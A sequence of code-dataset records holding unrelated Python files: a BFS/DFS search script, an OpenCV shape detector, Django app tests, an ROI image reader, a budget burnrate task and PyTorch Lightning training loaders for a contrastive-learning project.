neighbor in graph[node]:\n\t\t\t\t\tprint('gnode: ' , graph[node], '\\t neigh: ', neighbor)\n\t\t\t\t\tif neighbor in prev_nodes:\n\t\t\t\t\t\tcontinue\n\n\t\t\t\t\tprev_nodes[neighbor] = node\n\n\t\t\t\t\tqueue.append(neighbor)\n\n\t\t\t\t\t#if the end is found, return the list\n\t\t\t\t\tif neighbor == end:\n\t\t\t\t\t\tprint(\"prev node path: \" , prev_nodes)\n\t\t\t\t\t\t\n\t\t\t\t\t\tmapping.append(neighbor)\n\n\t\t\t\t\t\twhile prev_nodes[end] != start:\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\tmapping.append(prev_nodes[end])\n\t\t\t\t\t\t\tend = prev_nodes[end]\n\n\t\t\t\t\t\tmapping.append(start)\n\t\t\t\t\t\t\n\t\t\t\t\t\tmapping.reverse()\n\n\t\t\t\t\t\treturn (mapping)\n\t\t#backtrack if a dead-end is hit\n\t\t# if neighbor not in prev_nodes:\n\t\t\t# del mapping[-1]\n\n\ndef DFS(graph, start, end):\n\tfrom collections import deque\n\tprint(\"----------DFS---------\\n\")\n\n\tstack = deque([start])\n\tprev_nodes = {}\n\n\tmapping = []\n\t\n\twhile stack:\n\n\t\tnode = stack.pop()\n\n\t\tif node in graph:\n\n\t\t\tfor neighbor in graph:\n\n\t\t\t\t#if explored, ignore it\n\t\t\t\tif neighbor in graph[node]:\n\n\t\t\t\t\tprev_nodes[neighbor] = [node]\n\t\t\t\t\tstack.append(neighbor)\n\t\t\t\t\t\n\t\t\t\t\tprev_nodes[neighbor] = node\n\n\t\t\t\t\t#if the end is found, return the list\n\t\t\t\t\tif neighbor == end:\n\t\t\t\t\t\tmapping.append(neighbor)\n\n\t\t\t\t\t\twhile prev_nodes[end] != start:\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\tmapping.append(prev_nodes[end])\n\t\t\t\t\t\t\tend = prev_nodes[end]\n\n\t\t\t\t\t\tmapping.append(start)\n\t\t\t\t\t\t\n\t\t\t\t\t\tmapping.reverse()\n\n\t\t\t\t\t\treturn (mapping)\n\t\t#backtrack if a dead-end is hit\n\n\treturn []\n\ndef main(args):\n\timport sys\n\n\ttry:\n\t\ti_file = open(sys.argv[1], 'r')\n\texcept:\n\t\tprint('input_error %s')\n\t\tsys.exit(2)\n\n\tgraph = makeGraph(i_file)\n\tmapping = []\n#delet this \n\n\tgraph= {1:{2: 10, 3: 5},\n\t 2: {4: 10},\n\t 3: {4: 5},\n\t 4: {5: 5, 6: 10},\n\t 5: {7: 5},\n\t 6: {7: 10},\n\t 7: {}}\n\t# graph = {1:{2:34},\n\t# \t\t\t2:{3:192},\n\t# \t\t\t3:{4:43},\n\t# \t\t\t4:{5:137}}\n\n\t# graph = [dict([a, int(x)] for a, x in b.items()) for b in graph]\n\t# for b in graph:\n\t\t# print(type(b))\n\t# print(\"type: \", sys.argv[4])\n\n\tif sys.argv[2] == sys.argv[3]:\n\t\tprint(\"Start == End, terminate\")\n\t\treturn\n\n\tif sys.argv[4] == \"BFS\":\n\t\tmapping = BFS(graph, int(sys.argv[2]), int(sys.argv[3]) )\n\n\telif sys.argv[4] == \"DFS\":\n\t\tmapping = DFS(graph, int(sys.argv[2]), int(sys.argv[3]) )\n\n\tprint('\\n -----OUTPUT------\\n' ,mapping)\n\n\nif __name__ == '__main__':\n import sys\n main(sys.argv[1:])\n\n", "sub_path": "Search.py", "file_name": "Search.py", "file_ext": "py", "file_size_in_byte": 3325, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pandas.DataFrame", "line_number": 6, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 24, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 79, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 122, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 125, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 148, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 152, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 153, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 155, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 
156, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 163, "usage_type": "attribute"}]} +{"seq_id": "31561413", "text": "import cv2\nimport sys\nimport json\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\nshape='n/aaaa'\nimgPath=\"C:\\\\xampp\\\\htdocs\\\\projektmunka\\\\python\\\\haromszog.png\"\n#imgPath=sys.argv[1]\nimg = cv2.imread(imgPath, cv2.IMREAD_GRAYSCALE)\n_, threshold = cv2.threshold(img, 240, 255, cv2.THRESH_BINARY)\ncontours, _ = cv2.findContours(threshold, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\nfor cnt in contours:\n approx = cv2.approxPolyDP(cnt, 0.01*cv2.arcLength(cnt, True), True)\n cv2.drawContours(img, [approx], 0, (0), 5)\n x = approx.ravel()[0]\n y = approx.ravel()[1]\n if len(approx) == 3:\n shape=\"triangle\"\n elif len(approx) == 4:\n shape=\"square\"\n elif len(approx) == 5:\n shape=\"otszog\"\n elif 6 < len(approx) < 15:\n shape=\"sokszog\"\n else:\n shape=\"circle\"\nprint(shape)\n", "sub_path": "python/shapeRecognition.py", "file_name": "shapeRecognition.py", "file_ext": "py", "file_size_in_byte": 828, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "cv2.imread", "line_number": 10, "usage_type": "call"}, {"api_name": "cv2.IMREAD_GRAYSCALE", "line_number": 10, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 11, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 11, "usage_type": "attribute"}, {"api_name": "cv2.findContours", "line_number": 12, "usage_type": "call"}, {"api_name": "cv2.RETR_TREE", "line_number": 12, "usage_type": "attribute"}, {"api_name": "cv2.CHAIN_APPROX_SIMPLE", "line_number": 12, "usage_type": "attribute"}, {"api_name": "cv2.approxPolyDP", "line_number": 15, "usage_type": "call"}, {"api_name": "cv2.arcLength", "line_number": 15, "usage_type": "call"}, {"api_name": "cv2.drawContours", "line_number": 16, "usage_type": "call"}]} +{"seq_id": "17174717", "text": "from django.test import TestCase\nfrom django.urls import reverse\nfrom .models import Category, Products, Product_saved\nfrom django.contrib.auth.models import User\nfrom django.test import LiveServerTestCase\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nimport selenium.webdriver.support.ui as ui\nfrom selenium.webdriver import FirefoxOptions\n\n\n# Create your tests here.\n\ntestproduct = \"\"\ntestproduct2 = \"\"\n\n\ndef setting_up_db():\n testcategory = Category.objects.create(name=\"testcategory\")\n testproduct = Products.objects.create(name=\"testproduct\",\n nutriscore=4,\n image_url=\"/\",\n url_offacts=\"/\",\n energy_value=24.2,\n energy_unit=\"kcal\",\n sugars_100g=12.1,\n fat_100g=2,\n saturated_fat_100g=1.2,\n proteins=4,\n nutriscore_complete_url=\"myapp/assets\\\n /img/nutriscore/nutricomplet_e.png\",\n nutriscore_letter_url=\"myapp/assets\\\n /img/nutriscore/nutrilettre_e.png\")\n testproduct2 = Products.objects.create(name=\"testproduct2\",\n nutriscore=3,\n image_url=\"/\",\n url_offacts=\"/\",\n energy_value=24.2,\n energy_unit=\"kcal\",\n sugars_100g=12.1,\n fat_100g=2,\n saturated_fat_100g=1.2,\n proteins=4,\n nutriscore_complete_url=\"myapp\\\n /assets/img/nutriscore\\\n /nutricomplet_d.png\",\n nutriscore_letter_url=\"myapp/assets\\\n /img/nutriscore/nutrilettre_d.png\")\n testproduct.categories.add(testcategory)\n testproduct2.categories.add(testcategory)\n User.objects.create(username=\"Bob\",\n email=\"bob@gmail.com\",\n password=\"bobby\")\n\n\n# Index page\nclass 
IndexPageTestCase(TestCase):\n def test_index_page(self):\n response = self.client.get(reverse('index'))\n self.assertEqual(response.status_code, 200)\n\n\n# Legal notices\nclass LegalPageTestCase(TestCase):\n def test_legal_page(self):\n response = self.client.get(reverse('legal'))\n self.assertEqual(response.status_code, 200)\n\n\n# Search page\nclass SearchPageTestCase(TestCase):\n def setUp(self): # create data before tests start\n setting_up_db()\n\n def test_search_page_product_found(self):\n response = self.client.get(reverse('search'), {'query': 'testproduct'})\n self.assertEqual(response.status_code, 200)\n\n def test_search_page_product_not_found(self):\n response = self.client.get(reverse('search'), {'query': 'huhuhuhu'})\n self.assertEqual(response.status_code, 404)\n\n\n# Result page\nclass ResultPageTestCase(TestCase):\n def setUp(self): # create data before tests start\n setting_up_db()\n\n def test_result_page_product_found(self):\n myproduct = Products.objects.get(name=\"testproduct\")\n product_id = myproduct.id\n response = self.client.get(reverse('results', args=(product_id,)))\n self.assertEqual(response.status_code, 200)\n\n\n# Product detail\nclass DetailPageTestCase(TestCase):\n def setUp(self): # create data before tests start\n setting_up_db()\n\n def test_detail_page_product_found(self):\n myproduct = Products.objects.get(name=\"testproduct\")\n product_id = myproduct.id\n response = self.client.get(reverse('product_detail',\n args=(product_id,)))\n self.assertEqual(response.status_code, 200)\n\n\n# Save and delete a product\nclass SaveProductPageTestCase(TestCase):\n def setUp(self): # create data before tests start\n setting_up_db()\n\n def test_saveanddelete_product_page(self):\n self.client.force_login(user=User.objects.get(username='Bob'))\n saved_products = Product_saved.objects.all()\n products_number_before = len(saved_products)\n prod_to_save_selected = Products.objects.get(name=\"testproduct\")\n prod_to_save_sel_id = Products.objects.get(name=\"testproduct\").id\n prod_to_save_subst = Products.objects.get(name=\"testproduct2\")\n prod_save_subst_id = Products.objects.get(name=\"testproduct2\").id\n # Saving new product\n res = (self.client\n .get(reverse('save_product',\n kwargs={'product_selected_id': prod_to_save_sel_id,\n 'substitution_id': prod_save_subst_id})))\n self.assertEqual(res.status_code, 302)\n\n saved_products_after = Product_saved.objects.all()\n products_number_after = len(saved_products_after)\n self.assertEqual(products_number_after, (products_number_before + 1))\n\n # Deleting new product\n new_product_saved = (Product_saved.objects\n .get(product_selected=prod_to_save_selected,\n substitution_product=prod_to_save_subst,\n user=User.objects.get(username='Bob')))\n response2 = self.client.get(reverse('delete_product',\n args=(new_product_saved.id,)))\n self.assertEqual(response2.status_code, 302)\n products_number_finally = len(Product_saved.objects.all())\n self.assertEqual(products_number_finally, products_number_before)\n\n\n# ------------------- Selenium tests ------------------------#\n\"\"\"\nclass PlayerFormTest(LiveServerTestCase):\n\n def setUp(self):\n \n #Setting up selenium server\n \n opts = FirefoxOptions()\n opts.add_argument(\"--headless\")\n self.driver = webdriver.Firefox(firefox_options=opts)\n self.driver.get(\"http://89.107.63.240\")\n self.wait = ui.WebDriverWait(self.driver, 3000)\n\n def tearDown(self):\n \n #Closing the server\n \n self.driver.quit()\n\n def test_search_page(self):\n # find the elements you 
need to submit form\n search_test = \"nutella\"\n form = self.driver.find_element_by_id('searchForm')\n form.send_keys(search_test)\n form.send_keys(Keys.ENTER)\n self.driver.implicitly_wait(100)\n ui.WebDriverWait(self.driver, 3000)\n\n # testing search : nutella\n product_searched = (self.driver\n .find_element_by_id('product_searched').text)\n self.assertEqual(product_searched, \"Produit recherché : nutella\")\n url = self.driver.current_url\n self.assertEqual(url, \"http://89.107.63.240/myapp/search/?query=nutella\")\n\n # selecting the first product\n self.driver.find_element_by_partial_link_text(\"Nutella\").click()\n url = self.driver.current_url\n self.assertEqual(url, \"http://89.107.63.240/myapp/23/\")\n\n # see first product detail\n self.driver.find_element_by_partial_link_text(\"Pâte\").click()\n url = self.driver.current_url\n self.assertEqual(url, \"http://89.107.63.240/myapp/product_detail/35/\")\n\"\"\"\n", "sub_path": "myapp/tests.py", "file_name": "tests.py", "file_ext": "py", "file_size_in_byte": 7787, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "models.Category.objects.create", "line_number": 19, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 19, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 19, "usage_type": "name"}, {"api_name": "models.Products.objects.create", "line_number": 20, "usage_type": "call"}, {"api_name": "models.Products.objects", "line_number": 20, "usage_type": "attribute"}, {"api_name": "models.Products", "line_number": 20, "usage_type": "name"}, {"api_name": "models.Products.objects.create", "line_number": 34, "usage_type": "call"}, {"api_name": "models.Products.objects", "line_number": 34, "usage_type": "attribute"}, {"api_name": "models.Products", "line_number": 34, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User.objects.create", "line_number": 51, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 51, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 51, "usage_type": "name"}, {"api_name": "django.test.TestCase", "line_number": 57, "usage_type": "name"}, {"api_name": "django.urls.reverse", "line_number": 59, "usage_type": "call"}, {"api_name": "django.test.TestCase", "line_number": 64, "usage_type": "name"}, {"api_name": "django.urls.reverse", "line_number": 66, "usage_type": "call"}, {"api_name": "django.test.TestCase", "line_number": 71, "usage_type": "name"}, {"api_name": "django.urls.reverse", "line_number": 76, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 80, "usage_type": "call"}, {"api_name": "django.test.TestCase", "line_number": 85, "usage_type": "name"}, {"api_name": "models.Products.objects.get", "line_number": 90, "usage_type": "call"}, {"api_name": "models.Products.objects", "line_number": 90, "usage_type": "attribute"}, {"api_name": "models.Products", "line_number": 90, "usage_type": "name"}, {"api_name": "django.urls.reverse", "line_number": 92, "usage_type": "call"}, {"api_name": "django.test.TestCase", "line_number": 97, "usage_type": "name"}, {"api_name": "models.Products.objects.get", "line_number": 102, "usage_type": "call"}, {"api_name": "models.Products.objects", "line_number": 102, "usage_type": "attribute"}, {"api_name": "models.Products", "line_number": 102, "usage_type": "name"}, {"api_name": "django.urls.reverse", "line_number": 104, "usage_type": 
"call"}, {"api_name": "django.test.TestCase", "line_number": 110, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User.objects.get", "line_number": 115, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 115, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 115, "usage_type": "name"}, {"api_name": "models.Product_saved.objects.all", "line_number": 116, "usage_type": "call"}, {"api_name": "models.Product_saved.objects", "line_number": 116, "usage_type": "attribute"}, {"api_name": "models.Product_saved", "line_number": 116, "usage_type": "name"}, {"api_name": "models.Products.objects.get", "line_number": 118, "usage_type": "call"}, {"api_name": "models.Products.objects", "line_number": 118, "usage_type": "attribute"}, {"api_name": "models.Products", "line_number": 118, "usage_type": "name"}, {"api_name": "models.Products.objects.get", "line_number": 119, "usage_type": "call"}, {"api_name": "models.Products.objects", "line_number": 119, "usage_type": "attribute"}, {"api_name": "models.Products", "line_number": 119, "usage_type": "name"}, {"api_name": "models.Products.objects.get", "line_number": 120, "usage_type": "call"}, {"api_name": "models.Products.objects", "line_number": 120, "usage_type": "attribute"}, {"api_name": "models.Products", "line_number": 120, "usage_type": "name"}, {"api_name": "models.Products.objects.get", "line_number": 121, "usage_type": "call"}, {"api_name": "models.Products.objects", "line_number": 121, "usage_type": "attribute"}, {"api_name": "models.Products", "line_number": 121, "usage_type": "name"}, {"api_name": "django.urls.reverse", "line_number": 124, "usage_type": "call"}, {"api_name": "models.Product_saved.objects.all", "line_number": 129, "usage_type": "call"}, {"api_name": "models.Product_saved.objects", "line_number": 129, "usage_type": "attribute"}, {"api_name": "models.Product_saved", "line_number": 129, "usage_type": "name"}, {"api_name": "models.Product_saved.objects.get", "line_number": 134, "usage_type": "call"}, {"api_name": "models.Product_saved.objects", "line_number": 134, "usage_type": "attribute"}, {"api_name": "models.Product_saved", "line_number": 134, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User.objects.get", "line_number": 137, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 137, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 137, "usage_type": "name"}, {"api_name": "django.urls.reverse", "line_number": 138, "usage_type": "call"}, {"api_name": "models.Product_saved.objects.all", "line_number": 141, "usage_type": "call"}, {"api_name": "models.Product_saved.objects", "line_number": 141, "usage_type": "attribute"}, {"api_name": "models.Product_saved", "line_number": 141, "usage_type": "name"}]} +{"seq_id": "326511907", "text": "import numpy as np\n\nfrom PIL import Image\nfrom oii.iopipes import PartSource\nfrom oii.ifcb.formats.adc import BYTE_OFFSET, WIDTH, HEIGHT\nfrom array import array\nfrom StringIO import StringIO\n\nROI='roi'\n\ndef as_pil(array_or_image):\n try:\n return Image.fromarray(array_or_image)\n except:\n return array_or_image\n\ndef read_roi(source, target):\n \"\"\"target should be a dictionary containing BYTE_OFFSET, WIDTH, and HEIGHT,\n i.e., the output of read_adc,\n source is any openable stream or Source\"\"\"\n offset = target[BYTE_OFFSET]\n w = target[WIDTH]\n h = target[HEIGHT]\n size = w * h\n if size == 
0:\n raise KeyError('no ROI data for target')\n else:\n with PartSource(source,offset,size) as part:\n pixel_data = part.getvalue()\n return np.fromstring(pixel_data,np.uint8).reshape((w,h)) # rotate 90 deg\n\ndef read_rois(targets,roi_path=None,roi_file=None):\n \"\"\"roi_path = pathname of ROI file,\n roi_file = already open ROI file\"\"\"\n if roi_file is None:\n fp = open(roi_path,'rb')\n else:\n fp = roi_file\n for target in sorted(targets, key=lambda t: t[BYTE_OFFSET]):\n w = target[WIDTH]\n h = target[HEIGHT]\n size = w * h\n if size == 0:\n yield None\n else:\n fp.seek(target[BYTE_OFFSET])\n pixel_data = StringIO(fp.read(size)).getvalue()\n yield np.fromstring(pixel_data,np.uint8).reshape((w,h)) # rotate 90 deg\n if roi_path is not None:\n fp.close()\n", "sub_path": "ifcb/formats/roi.py", "file_name": "roi.py", "file_ext": "py", "file_size_in_byte": 1526, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "PIL.Image.fromarray", "line_number": 13, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 13, "usage_type": "name"}, {"api_name": "oii.ifcb.formats.adc.BYTE_OFFSET", "line_number": 21, "usage_type": "name"}, {"api_name": "oii.ifcb.formats.adc.WIDTH", "line_number": 22, "usage_type": "name"}, {"api_name": "oii.ifcb.formats.adc.HEIGHT", "line_number": 23, "usage_type": "name"}, {"api_name": "oii.iopipes.PartSource", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.fromstring", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 30, "usage_type": "attribute"}, {"api_name": "oii.ifcb.formats.adc.BYTE_OFFSET", "line_number": 39, "usage_type": "name"}, {"api_name": "oii.ifcb.formats.adc.WIDTH", "line_number": 40, "usage_type": "name"}, {"api_name": "oii.ifcb.formats.adc.HEIGHT", "line_number": 41, "usage_type": "name"}, {"api_name": "oii.ifcb.formats.adc.BYTE_OFFSET", "line_number": 46, "usage_type": "name"}, {"api_name": "StringIO.StringIO", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.fromstring", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 48, "usage_type": "attribute"}]} +{"seq_id": "37179922", "text": "# -*- coding: utf-8 -*-\nfrom base_task import Task\nfrom datetime import date\nfrom dateutil.relativedelta import relativedelta\nimport json\nfrom lib.ah_requests import AhRequest\nfrom lib.mongodb import Mongo\nfrom logger import Logger\nimport helper_functions as helpers\n\nLOG = Logger()\n\nclass Burnrate(Task):\n def __init__(self, remote_url=None, **args):\n Task.__init__(self,name=self.__class__.__name__, remote_url=remote_url, args=args)\n self.loading_msg = 'Calculating your burnrate'\n self._requires = ['PaymentsComing','PaymentsResult']\n self.conn = Mongo()\n self.mdb = self.conn.db\n \n def run(self):\n self.start()\n try:\n completed_payments = self.input['PaymentsResult']\n comming_payments = self.input['PaymentsComing']\n \n today = helpers.strToDate(helpers.today())\n\n budget_current_year = 0\n\n # sum Completed payments current year\n completed_payments = completed_payments['transactions'][0]['payments']\n completed_payments_this_year = []\n for p in completed_payments:\n payment_date = helpers.strToDate(p['date'])\n if payment_date.year == today.year:\n budget_current_year = budget_current_year + p['amount']\n p['new_budget'] = p['amount'] + p['abs_diff']\n completed_payments_this_year.append(p)\n\n # sum Comming payments current year\n comming_payments = 
comming_payments['transactions'][0]['payments']\n comming_payments_this_year = []\n for p in comming_payments:\n payment_date = helpers.strToDate(p['date'])\n if payment_date.year == today.year:\n budget_current_year = budget_current_year + p['amount']\n p['new_budget'] = helpers.pct_change(p['amount'], p['pct_diff_since_start']) + p['amount']\n comming_payments_this_year.append(p)\n\n result_so_far = helpers.sum_by_key(completed_payments_this_year,'new_budget')\n result_comming = helpers.sum_by_key(comming_payments_this_year,'new_budget')\n \n burnrate_abs = (result_so_far+result_comming)-budget_current_year\n burnrate_pct = helpers.pct_part_number(burnrate_abs,budget_current_year)\n \n self.output = dict(burnrate_abs=burnrate_abs, burnrate_pct=burnrate_pct)\n except Exception as e:\n self.status = 'Failed'\n self.exception = str(e)\n pass\n self.conn.close()\n self.stop()\n \n def __repr__(self):\n return str(self.name)\n", "sub_path": "workers/tasks/task__burnrate.py", "file_name": "task__burnrate.py", "file_ext": "py", "file_size_in_byte": 2694, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "logger.Logger", "line_number": 11, "usage_type": "call"}, {"api_name": "base_task.Task", "line_number": 13, "usage_type": "name"}, {"api_name": "base_task.Task.__init__", "line_number": 15, "usage_type": "call"}, {"api_name": "base_task.Task", "line_number": 15, "usage_type": "name"}, {"api_name": "lib.mongodb.Mongo", "line_number": 18, "usage_type": "call"}, {"api_name": "helper_functions.strToDate", "line_number": 27, "usage_type": "call"}, {"api_name": "helper_functions.today", "line_number": 27, "usage_type": "call"}, {"api_name": "helper_functions.strToDate", "line_number": 35, "usage_type": "call"}, {"api_name": "helper_functions.strToDate", "line_number": 45, "usage_type": "call"}, {"api_name": "helper_functions.pct_change", "line_number": 48, "usage_type": "call"}, {"api_name": "helper_functions.sum_by_key", "line_number": 51, "usage_type": "call"}, {"api_name": "helper_functions.sum_by_key", "line_number": 52, "usage_type": "call"}, {"api_name": "helper_functions.pct_part_number", "line_number": 55, "usage_type": "call"}]} +{"seq_id": "382707124", "text": "import os\nimport argparse\n\nimport wandb\nimport pytorch_lightning as pl\nfrom pytorch_lightning.loggers import WandbLogger\nfrom pytorch_lightning.callbacks import ModelCheckpoint, LearningRateMonitor\n\nimport lwclr.models as models\nfrom .datamodules import CIFAR10DM, CIFAR100DM, ImageNetDM, DanbooruFacesFullDM\n\ndef ret_args(ret_parser=False):\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument('--mode', type=str, \n choices=['simclr', 'lwclr_full_mult', 'lwclr_full_single', \n 'lwclr_cont_mult', 'lwclr_cont_single', 'linear_eval', 'fine_tuning'],\n default='simlwclr', help='Framework for training and evaluation')\n\n parser.add_argument('--seed', type=int, default=0, help='random seed for initialization')\n parser.add_argument('--no_cpu_workers', type=int, default=4, help='CPU workers for data loading.')\n\n parser.add_argument('--results_dir', default='results_training', type=str,\n help='The directory where results will be stored')\n parser.add_argument('--save_checkpoint_freq', default=100, type=int,\n help='Frequency (in epochs) to save checkpoints')\n\n parser.add_argument('--dataset_name', \n choices=['cifar10', 'cifar100', 'imagenet', 'danboorufaces', 'danboorufull'], \n default='cifar10', help='Which dataset to use.')\n 
parser.add_argument('--dataset_path', help='Path for the dataset.')\n parser.add_argument(\"--deit_recipe\", action='store_true',\n help=\"Use DeiT training recipe\")\n \n parser.add_argument('--image_size', default=224, type=int,\n help='Image (square) resolution size')\n parser.add_argument('--batch_size', default=64, type=int,\n help='Batch size for train/val/test.')\n \n parser = models.LitSimCLR.add_model_specific_args(parser)\n \n parser = pl.Trainer.add_argparse_args(parser)\n parser.set_defaults(gpus=1, max_epochs=2, gradient_clip_val=1.0)\n parser.set_defaults(precision=16, log_gpu_memory=None, profiler=None, benchmark=True)\n\n if ret_parser:\n return parser\n args = parser.parse_args()\n\n args.run_name = '{}_layers{}_{}_{}_is{}_bs{}_{}lr{}wd{}_seed{}'.format(\n args.mode, args.cont_layers_range, args.dataset_name, args.model_name, args.image_size, args.batch_size, \n args.optimizer, args.learning_rate, args.weight_decay, args.seed)\n\n if args.deit_recipe:\n ''' taken from DeiT paper\n https://arxiv.org/abs/2012.12877\n https://github.com/facebookresearch/deit/blob/main/main.py'''\n # augmentation and random erase params\n args.color_jitter = 0.4\n args.aa = 'rand-m9-mstd0.5-inc1'\n args.smoothing = 0.1\n args.train_interpolation = 'bicubic'\n args.repeated_aug = True\n args.reprob = 0.25\n args.remode = 'pixel'\n args.recount = 1\n args.resplit = False\n # mixup params\n args.mixup = 0.8\n args.cutmix = 1.0\n args.cutmix_minmax = None\n args.mixup_prob = 1.0\n args.mixup_switch_prob = 0.5\n args.mixup_mode = 'batch'\n\n return args\n\ndef load_trainer(args, model, wandb_logger):\n # https://lightning-bolts.readthedocs.io/en/latest/self_supervised_callbacks.html\n # https://github.com/PyTorchLightning/lightning-bolts/blob/47eb2aae677350159c9ec0dc8ccdb6eef4217fff/pl_bolts/callbacks/ssl_online.py#L66\n checkpoint_callback = ModelCheckpoint(\n dirpath=os.path.join(args.results_dir, args.run_name), \n filename='{epoch}', monitor='val_loss', save_on_train_epoch_end=False, \n verbose=True, save_top_k=-1, save_last=True, save_weights_only=True,\n mode='min', every_n_epochs=args.save_checkpoint_freq)\n\n lr_monitor = LearningRateMonitor(logging_interval='step')\n\n if args.mode not in ['linear_eval', 'fine_tuning']:\n online_eval_callback = models.SSLOnlineLinearEvaluator(\n mode=args.mode, z_dim=model.backbone.configuration.hidden_size, \n num_classes=args.num_classes, lr=args.learning_rate)\n trainer = pl.Trainer.from_argparse_args(args, callbacks=[checkpoint_callback, lr_monitor, online_eval_callback])\n else:\n trainer = pl.Trainer.from_argparse_args(args, callbacks=[checkpoint_callback, lr_monitor])\n trainer.logger = wandb_logger\n \n return trainer\n\n\ndef load_plmodel(args):\n if args.mode == 'simclr':\n model = models.LitSimCLR(args)\n elif args.mode in ['lwclr_full_mult', 'lwclr_full_single']:\n model = models.LitLWCLRFull(args)\n elif args.mode in ['lwclr_cont_mult', 'lwclr_cont_single']:\n model = models.LitLWCLRCont(args)\n elif args.mode == 'linear_eval' or args.mode == 'fine_tuning':\n model = models.LitEvaluator(args)\n return model\n\n\ndef return_prepared_dm(args):\n\n # setup data\n if args.dataset_name == 'cifar10':\n dm = CIFAR10DM(args)\n elif args.dataset_name == 'cifar100':\n dm = CIFAR100DM(args)\n elif args.dataset_name == 'imagenet':\n assert args.dataset_path, \"Dataset path must not be empty.\"\n dm = ImageNetDM(args)\n elif args.dataset_name == 'danboorufaces' or 'danboorufull':\n assert args.dataset_path, \"Dataset path must not be empty.\"\n dm = 
DanbooruFacesFullDM(args)\n \n    dm.prepare_data()\n    dm.setup('fit')\n    args.num_classes = dm.num_classes\n\n    if args.max_steps:\n        total_steps = args.max_steps\n    else:\n        total_steps = args.max_epochs * len(dm.train_dataloader())\n    args.total_steps = total_steps\n\n    if args.warmup_epochs:\n        args.warmup_steps = args.warmup_epochs * len(dm.train_dataloader())\n \n    return dm\n\n\ndef environment_loader(args, init=True):\n \n    # set up W&B logger\n    if init:\n        os.makedirs(args.results_dir, exist_ok=True)\n        wandb.init(config=args)\n        wandb.run.name = args.run_name\n    wandb_logger = WandbLogger(name=args.run_name)\n \n    # seed everything\n    pl.seed_everything(seed=args.seed)\n\n    # prepare datamodule\n    dm = return_prepared_dm(args)\n\n    # setup model and trainer\n    model = load_plmodel(args)\n    trainer = load_trainer(args, model, wandb_logger)\n \n    return dm, trainer, model\n", "sub_path": "lwclr/utilities/loaders.py", "file_name": "loaders.py", "file_ext": "py", "file_size_in_byte": 6297, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 14, "usage_type": "call"}, {"api_name": "lwclr.models.LitSimCLR.add_model_specific_args", "line_number": 41, "usage_type": "call"}, {"api_name": "lwclr.models.LitSimCLR", "line_number": 41, "usage_type": "attribute"}, {"api_name": "lwclr.models", "line_number": 41, "usage_type": "name"}, {"api_name": "pytorch_lightning.Trainer.add_argparse_args", "line_number": 43, "usage_type": "call"}, {"api_name": "pytorch_lightning.Trainer", "line_number": 43, "usage_type": "attribute"}, {"api_name": "pytorch_lightning.callbacks.ModelCheckpoint", "line_number": 82, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 83, "usage_type": "call"}, {"api_name": "os.path", "line_number": 83, "usage_type": "attribute"}, {"api_name": "pytorch_lightning.callbacks.LearningRateMonitor", "line_number": 88, "usage_type": "call"}, {"api_name": "lwclr.models.SSLOnlineLinearEvaluator", "line_number": 91, "usage_type": "call"}, {"api_name": "lwclr.models", "line_number": 91, "usage_type": "name"}, {"api_name": "pytorch_lightning.Trainer.from_argparse_args", "line_number": 94, "usage_type": "call"}, {"api_name": "pytorch_lightning.Trainer", "line_number": 94, "usage_type": "attribute"}, {"api_name": "pytorch_lightning.Trainer.from_argparse_args", "line_number": 96, "usage_type": "call"}, {"api_name": "pytorch_lightning.Trainer", "line_number": 96, "usage_type": "attribute"}, {"api_name": "lwclr.models.LitSimCLR", "line_number": 104, "usage_type": "call"}, {"api_name": "lwclr.models", "line_number": 104, "usage_type": "name"}, {"api_name": "lwclr.models.LitLWCLRFull", "line_number": 106, "usage_type": "call"}, {"api_name": "lwclr.models", "line_number": 106, "usage_type": "name"}, {"api_name": "lwclr.models.LitLWCLRCont", "line_number": 108, 